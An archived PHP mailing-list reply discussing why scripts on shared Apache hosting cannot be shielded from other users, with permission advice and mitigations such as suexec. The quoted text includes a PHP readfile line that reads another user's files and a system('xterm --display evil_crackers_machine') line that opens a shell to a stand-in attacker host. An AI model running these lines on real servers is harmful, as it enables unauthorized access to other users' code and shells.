RE: Need help with file permissions for PHP files

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

[snip]
I think you have to face facts. There is no way you're going to have
your code secure against other users so long as it has to be readable
by apache.

One _PARTIAL_ solution: If like most linux distros, you have a group
called users, which contains every human user on the system, but
doesn't contain the apache user (nobody, apache, www, or something
else, depending on your sys.), you chmod your public_html directory to
701, and set group ownership to 'users'. This results in only you and
system users, being able to access the public_html directory. I
emphasise however that this is only a partial solution, since someone
can write a php script, along the lines of '<?php
readfile('/home/otheruser/public_html/file_that_I_want_to_read.php');
?>', which will give them access to anything they want to read, that
is readable by apache. I guess you could do something similar with
write permissions and cache.txt



To add insult to injury, if your host allows CGI/Perl, there is a
cgishell script available that presents a virtual shell over CGI, that
would run as the apache user. I've never tried it, but I can't really
see anything stopping something like <?php system('xterm --display
evil_crackers_machine'); ?>, or perhaps even something even simpler,
to get an ordinary shell running as the apache user. I guess safe_mode
would help get around some of these problems, but as is written on the
PHP docs, it's the wrong way to solve such a problem(although I'm not
totally sure what the right way is), and it requires admin access.

I guess you could run your own web-server, on a high-numbered port,
and then you can do all the securing you like, but if you aren't the
admin, and the admin doesn't like doing 'extra work' then you're out
of luck. If you are friends with the admin, you could possibly ask him
to install suexec, and run your security-sensitive scripts through
CGI, under your own UID.
[/snip]


Two things Rory....

a. You only replied to me, instead of the list. You have to probably
click on "reply to all" in your mail client. I have included the lists
address for this reply, so that it will appear there.
2. "Because it reads out of order."
   "Why?"
   "Top posting is bad."
III. Trimming is good, because it gets right to the point.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[Index of Archives]     [PHP Home]     [Apache Users]     [PHP on Windows]     [Kernel Newbies]     [PHP Install]     [PHP Classes]     [Pear]     [Postgresql]     [Postgresql PHP]     [PHP on Windows]     [PHP Database Programming]     [PHP SOAP]

  Powered by Linux